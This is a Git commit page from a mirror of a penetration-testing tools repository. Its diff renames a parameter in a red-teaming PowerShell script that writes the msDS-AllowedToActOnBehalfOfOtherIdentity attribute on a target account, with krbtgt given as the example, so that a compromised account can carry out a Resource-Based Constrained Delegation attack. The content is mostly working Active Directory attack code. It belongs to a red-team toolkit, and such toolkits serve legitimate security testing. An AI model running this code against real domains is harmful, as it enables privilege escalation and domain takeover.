Git
/
mgeeky-Penetration-Testing-Tools
mirror of https://github.com/mgeeky/Penetration-Testing-Tools.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

fixed paramter name

This commit is contained in:
mgeeky 2019-08-22 15:46:08 +02:00
parent 0062483b8b
commit a99ab7a0bf
1 changed files with 6 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
red-teaming/Set-PrincipalAllowedToDelegateToAccount.ps1
View File

@ -3,10 +3,10 @@
# #
# Usage: # Usage:
# PS> . .\Set-PrincipalAllowedToDelegateToAccount.ps1 # PS> . .\Set-PrincipalAllowedToDelegateToAccount.ps1
# PS> Set-PrincipalAllowedToDelegateToAccount -TargetUser krbtgt -TargetComputer COMPROMISED$ # PS> Set-PrincipalAllowedToDelegateToAccount -TargetUser krbtgt -DelegateFrom COMPROMISED$
# #
# Will allow for COMPROMISED$ machine account to perform S4U2 constrained delegation by the use # Will allow for COMPROMISED$ account to perform S4U2 constrained delegation by the use
# of Resource-Based Constrained Delegation flavour attack. # of Resource-Based Constrained Delegation flavour attack. This account must have any SPN set first.
# #
# Script for setting "msDS-AllowedToActOnBehalfOfOtherIdentity" property on the user's object, # Script for setting "msDS-AllowedToActOnBehalfOfOtherIdentity" property on the user's object,
# allowing incoming trust to the previously compromised Machine object, as described # allowing incoming trust to the previously compromised Machine object, as described
@ -31,11 +31,11 @@ function Set-PrincipalAllowedToDelegateToAccount
[Parameter(Position = 1)] [Parameter(Position = 1)]
[ValidateNotNullOrEmpty()] [ValidateNotNullOrEmpty()]
[String] [String]
$TargetComputer $DelegateFrom
) )
# translate the identity to a security identifier # translate the identity to a security identifier
$IdentitySID = ((New-Object -TypeName System.Security.Principal.NTAccount -ArgumentList $TargetComputer).Translate([System.Security.Principal.SecurityIdentifier])).Value $IdentitySID = ((New-Object -TypeName System.Security.Principal.NTAccount -ArgumentList $DelegateFrom).Translate([System.Security.Principal.SecurityIdentifier])).Value
# Substitute the security identifier into the raw SDDL # Substitute the security identifier into the raw SDDL
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($IdentitySID))" $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($IdentitySID))"
@ -46,4 +46,4 @@ function Set-PrincipalAllowedToDelegateToAccount
# set new security descriptor for 'msds-allowedtoactonbehalfofotheridentity' # set new security descriptor for 'msds-allowedtoactonbehalfofotheridentity'
Get-DomainUser $TargetUser | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose Get-DomainUser $TargetUser | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
} }